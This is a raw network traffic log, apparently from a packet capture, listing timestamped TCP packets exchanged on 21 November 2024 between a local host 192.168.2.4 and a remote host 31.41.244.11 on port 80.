                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.037166119 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.037271023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.038120031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.038175106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.038206100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.038247108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.039232969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.039285898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.039338112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.039383888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.040304899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.040353060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.040426016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.040473938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.041414976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.041464090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.041668892 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.041716099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.042507887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.042552948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.042594910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.042640924 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.043653965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.043703079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.043736935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.043783903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.044670105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.044718027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.044760942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.044806957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.045743942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.045792103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.045872927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.045919895 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.046837091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.046911955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.046973944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.047023058 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.047955036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.048029900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.048058987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.048105001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.049184084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.049236059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.049248934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.049297094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.050215006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.050261974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.203597069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.203629971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.203814030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.203814030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.204055071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.204164028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.204220057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.205231905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.205286980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.205359936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.206223965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.206274033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.206293106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.206345081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.207310915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.207371950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.207488060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.207536936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.208446026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.208503008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.208539009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.208586931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.209521055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.209630966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.209677935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.210573912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.210623980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.210709095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.210793972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.211730003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.211790085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.211863041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.211911917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.212747097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.212873936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.212932110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.213871956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.213921070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.213959932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.214010000 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.214987040 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.215038061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.215101957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.215150118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.216177940 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.216244936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.216259003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.216309071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.217140913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.217245102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.217294931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.218210936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.218261003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.218298912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.218352079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.219333887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.219387054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.219456911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.219527960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.220387936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.220451117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.220484018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.220532894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.221465111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.221642017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.221695900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.222567081 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.222616911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.222688913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.222750902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.223721027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.223773003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.223812103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.223861933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.224781036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.224867105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.224920034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.225836992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.225886106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.225944042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.225992918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.226907015 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.226962090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.227010965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.227060080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.228002071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.228053093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.228105068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.228156090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.229104042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.229209900 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.229262114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.230202913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.230361938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.230420113 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.231635094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.231700897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.231774092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.231826067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.232654095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.232706070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.232786894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.233489990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.233542919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.233634949 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.233683109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.234544039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.234594107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.234632015 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.234680891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.235658884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.235708952 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.235810995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.235860109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.236735106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.236845016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.236896038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.237801075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.237850904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.237893105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.237940073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.238924980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.238976955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.239010096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.239058018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.240010977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.240092993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.240125895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.240170956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.241122961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.241360903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.241415977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.242198944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.242312908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.242377996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.243256092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.243336916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.243350983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.243402004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.244400024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.244447947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.244525909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.244574070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.245537043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.245779991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.245836020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.246763945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.246814966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.246953011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.247004032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.248050928 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.248100996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.248140097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.248187065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.248912096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.248989105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.249042034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.249877930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.249921083 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.249933958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.249962091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.251017094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.251070023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.251120090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.251163006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.251988888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.252038002 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.252134085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.252178907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.253057957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.253171921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.253223896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.254318953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.254370928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.254412889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.254467010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.255397081 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.255448103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.255467892 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.255517960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.256342888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.256392002 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.256448984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.256495953 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.257412910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.257531881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.257584095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.258572102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.258625031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.258654118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.258706093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.259706020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.259753942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.259780884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.259826899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.260674953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.260730982 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.415541887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.415621996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.415802956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.415957928 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.416023970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.416167974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.416218996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.416259050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.416309118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.417269945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.417397976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.417453051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.418365955 CET804977031.41.244.11192.168.2.4
